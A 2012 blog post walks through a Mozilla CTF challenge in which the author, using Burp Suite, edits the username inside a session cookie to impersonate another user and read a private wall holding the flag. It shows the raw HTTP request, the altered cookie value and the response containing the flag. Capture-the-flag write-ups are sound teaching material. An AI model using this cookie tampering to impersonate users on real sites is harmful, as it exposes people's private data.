Thursday, January 26, 2012

Mozilla CTF 2012 - Fishr - Fish your messages out of the sea (500)

Challenge 19 was the first that I began to work on.


19 - Fishr - Fish your messages out of the sea
Please log in to Fishr using the name 0wn and the password pwnthis.
The flag is on fl4gdud3's wall, get it.
gold: 500 +3 (1st), +2 (2nd), +1 (3rd)

This challenge was worth the largest of the challenges and thought it would be a good starting point.


The game play was strait forward that the flag was on Fl4gdud3's wall. For this I chose to use Burpesuite for this while I was looking around.  Once logged in you can see that you have friends that you can see like twitter. As you click around you will see the "admin" is following  and the others that are following admin which happens to be "flagdud3" . This was the first piece to the puzzle now that you know the real name that you are looking for not the dude with the 4 in his name.

Upon trying to browse to "flagdud3's" page you get an:

Sorry, but there are no visible Posts. This user might have set his wall to private and you lack the permission to read private wall messages.

Now you know that you need to find a way to get to this wall as a different user. Lets turn to burpe and look at the request.


GET /ajax.php?p=wall&arg=flagdud3 HTTP/1.1
Host: challenge19.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Referer: https://challenge19.mozillactf.org/index.php
Cookie: data=7%3A0wn%3A0wn%2540spam.com; mac=eccc50cafdb69aac25dba7738651ddff
DNT: 1
Connection: keep-alive
 The cookie is the key and you can see that your username is in it.

7%3A0wn%3A0wn%2540spam.com;

So if you send this request to repeater and alter the request to be "flagdud3" and looks like:

7%3Aflagdud3%3Aflagdud3%2540spam.com;

you will get the response that you are looking for:

  Kickin' in the front seat - sittin' in the back seat...
    <span class="time">- posted at 27.12.2011 16:32</span>
  </div>
  <div class="post">
    <b>flagdud3:</b>
    Flag: s0ci4lly4wkw4rd
    <span class="time">- posted at 26.12.2011 12:46</span>

 And there you have it 500 points




No comments:

Post a Comment